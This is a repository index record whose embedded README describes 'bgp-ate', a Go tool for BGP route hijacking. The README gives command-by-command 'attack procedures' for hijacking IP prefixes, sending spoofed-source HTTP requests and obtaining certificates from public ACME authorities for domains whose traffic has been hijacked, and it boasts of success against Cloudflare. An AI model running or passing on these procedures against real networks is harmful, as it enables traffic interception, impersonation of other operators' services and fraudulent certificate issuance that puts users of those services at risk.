{"id":30758754,"url":"https://github.com/seadog007/bgp-ate","last_synced_at":"2026-03-06T16:03:37.014Z","repository":{"id":295922058,"uuid":"989784994","full_name":"seadog007/bgp-ate","owner":"seadog007","description":"A tool for BGP route manipulation and certificate generation. (Basically BGP Hijack)","archived":false,"fork":false,"pushed_at":"2025-06-01T16:49:42.000Z","size":47,"stargazers_count":2,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-10-09T03:14:45.634Z","etag":null,"topics":["acme-client","acme-http","bgp","bgp-hijacking","certificate-generation"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/seadog007.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-05-24T20:24:49.000Z","updated_at":"2025-07-23T11:50:00.000Z","dependencies_parsed_at":"2025-06-02T23:03:38.935Z","dependency_job_id":null,"html_url":"https://github.com/seadog007/bgp-ate","commit_stats":null,"previous_names":["seadog007/bgp-ate"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/seadog007/bgp-ate","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seadog007%2Fbgp-ate","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seadog007%2Fbgp-ate/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seadog007%2Fbgp-ate/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seadog007%2Fbgp-ate/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/seadog007","download_url":"https://codeload.github.com/seadog007/bgp-ate/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seadog007%2Fbgp-ate/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30184885,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-06T14:42:24.748Z","status":"ssl_error","status_checked_at":"2026-03-06T14:42:14.925Z","response_time":250,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["acme-client","acme-http","bgp","bgp-hijacking","certificate-generation"],"created_at":"2025-09-04T11:12:00.425Z","updated_at":"2026-03-06T16:03:36.992Z","avatar_url":"https://github.com/seadog007.png","language":"Go","funding_links":[],"categories":[],"sub_categories":[],"readme":"# BGP-ATE\n\nBGP-ATE is a tool for BGP route hijacking and certificate generation.\n\n## Features\n\n- BGP route hijacking\n- Certificate generation with route hijacking\n- HTTP requests with source IP spoofing\n- Support for both IPv4 and IPv6\n- RPKI validation\n- Community attribute support\n- Dry run mode for testing\n\n## Prerequisites\n\n- Go 1.21 or later\n- GoBGP v3.37.0 or later\n- GoBGP daemon running on localhost:50051\n- Root privileges for iphelper command\n\n## Installation\n\n1. Install GoBGP:\n```bash\n# Make the setup script executable\nchmod +x setup.sh\n\n# Run the setup script\n./setup.sh\n\n# Add gobgpbin to your PATH (optional)\nexport PATH=\"$(pwd)/gobgpbin:$PATH\"\n```\n\n2. Install the BGP control system:\n```bash\ngo build\n```\n\n## Usage\n\n1. Start the GoBGP daemon:\n```bash\nsudo gobgpbin/gobgpd -f gobgpd.conf\n```\n2. Run the control system:\n```bash\n./bgpate\n```\n\n## Configuration\n\nThe system uses `gobgpd.conf` for GoBGP configuration and `config.json` file for configuration. Here's an example:\n\n```json\n{\n    \"communities\": [\"large:18041:999:2\"],\n    \"time\": 10,\n    \"timeBeforeGeneratingCertificate\": 5,\n    \"timeBeforeExecutingCurl\": 0,\n    \"iphelperGatewayV4\": \"192.168.99.1\",\n    \"iphelperGatewayV6\": \"2401:16a0:999::1\",\n    \"caDirUrl\": \"https://acme-v02.api.letsencrypt.org/directory\",\n    \"eabKid\": \"\",\n    \"eabHmacKey\": \"\"\n}\n```\n\n### Configuration Options\n\n- `communities`: List of BGP communities (standard or large format)\n  - Standard format: `\"AS:value\"` (e.g., `\"65000:123\"`)\n  - Large format: `\"large:AS:value1:value2\"` (e.g., `\"large:18041:999:2\"`)\n- `time`: Time in seconds to wait after hijacking\n- `timeBeforeGeneratingCertificate`: Time in seconds to wait before generating certificate\n- `timeBeforeExecutingCurl`: Time in seconds to wait before executing curl request\n- `iphelperGatewayV4`: IPv4 Gateway IP for iphelper command\n- `iphelperGatewayV6`: IPv6 Gateway IP for iphelper command\n- `caDirUrl`: ACME CA directory URL (optional, defaults to Let's Encrypt production)\n- `eabKid`: External Account Binding Key ID (optional)\n- `eabHmacKey`: External Account Binding HMAC Key (optional)\n\n### CA Directory URLs\n\nThe `caDirUrl` field supports different ACME CA servers:\n\n1. Let's Encrypt Production:\n```json\n\"caDirUrl\": \"https://acme-v02.api.letsencrypt.org/directory\"\n```\n\n2. Buypass:\n```json\n\"caDirUrl\": \"https://api.buypass.com/acme/directory\"\n```\n\n3. Google Public CA\n```json\n\"caDirUrl\": \"https://dv.acme-v02.api.pki.goog/directory\"\n```\nuse `gcloud publicca external-account-keys create` to generate eabKid \u0026 eabHmacKey.\n\n4. ZeroSSL\n```json\n\"caDirUrl\": \"https://acme.zerossl.com/v2/DV90\"\n```\n\nIf `caDirUrl` is not specified, the tool will use Let's Encrypt's production server by default.\n\n## Usage\n\n### Building\n```bash\ngo build\n```\n\n### Clear Routes\n```bash\n./bgpate clear\n```\n\n### Hijack Routes\n```bash\n./bgpate hijack \u003cip\u003e [--dryrun]\n```\n\n### Generate Certificate\n```bash\n./bgpate certgen \u003cdomain\u003e [--dryrun] [--ip \u003cip1,ip2,...\u003e]\n```\n\n### IP Helper\n```bash\n./bgpate iphelper \u003cip\u003e [-d]\n```\n\n### Make Curl Request\n```bash\n./bgpate curl \u003csource_ip\u003e \u003curl\u003e [--dryrun] [curl arguments...]\n```\n\n## Full BGP Hijack Attack Procedures\n\n1. Run \n```bash\n./bgpate iphelper \u003cip\u003e\n```\n\n2. \n```bash\n./bgpate hijack \u003cip\u003e\n```\n\n3. Run curl to confirm the hijacking is success\n```\ncurl --interface \u003cip\u003e https://1.1.1.1/cdn-cgi/trace\n```\n\n4. Remove IP configuration on the system\n```bash\n./bgpate iphelper \u003cip\u003e -d\n```\n\n## Full Certification Generating Attack Procedures\n\n### Use domain resolution (original behavior)\n```bash\n./bgpate certgen example.com\n```\n\n### Override with specific IPs (comma-separated)\n```bash\n./bgpate certgen example.com --ip 192.168.1.1,2001:db8::1\n```\n\nIt will generate key-pair under `certs` folder\n\n## HTTP Reuqest from any IP with fast hijacking\n```bash\n./bgpate curl \u003cip\u003e 'https://1.1.1.1/cdn-cgi/trace' [Other curl arguments]\n```\n\nThe attack succeed within less than 3 second against Cloudflare.\n\n## Notes\n\n- The tool will automatically clean up routes when interrupted (Ctrl+C)\n- For certificate generation, make sure port 80 is available for HTTP-01 challenge\n- When using EAB, both `eabKid` and `eabHmacKey` must be provided\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fseadog007%2Fbgp-ate","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fseadog007%2Fbgp-ate","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fseadog007%2Fbgp-ate/lists"}